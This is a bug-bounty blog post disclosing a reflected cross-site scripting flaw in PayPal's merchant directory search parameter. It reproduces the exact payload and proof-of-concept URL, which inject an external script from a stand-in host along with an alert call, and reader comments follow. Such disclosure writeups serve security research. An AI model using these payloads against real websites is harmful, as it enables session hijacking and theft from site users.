[BugBounty] Reflected Cross Site Scripting at Paypal.com

Dear followers, i found a reflected Cross Site Scripting issue on the new Paypal Directory service (https://www.paypal.com/directory/merchants), with the following Payload:

&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E

The vulnerable Parameter was the q? Parameter, i was able to break the script contex of the page, i think it was because of the &q Parameteter, but i am not sure Paypal fixed this issue to fast so i couldn’t analyze it more in depth :/

https://www.paypal.com/directory/merchants?q=&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E

Here is my POC i sent in to Paypal :  hope you enjoyed! If you have any kind of question please don’t hesitate to ask me, either way here or via email at patrik.fehrenbach(at)it-securityguard.com All the best Patrik


3 Gedanken zu „[BugBounty] Reflected Cross Site Scripting at Paypal.com

  1. I have been working in Security in the UK for 10 years. I have only started to get a bit grumpy about security in general, however after reading this piece it has helped changed my attitude a bit. Time for a project methinks 🙂

  2. I think you could get XSS via “&q=payload” because of HPP ( HTTP Parameter Pollution) .
    First “q” parameter value was getting filtered while second “q” parameter value was being used for generating output 😀

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Diese Website verwendet Akismet, um Spam zu reduzieren. Erfahre mehr darüber, wie deine Kommentardaten verarbeitet werden.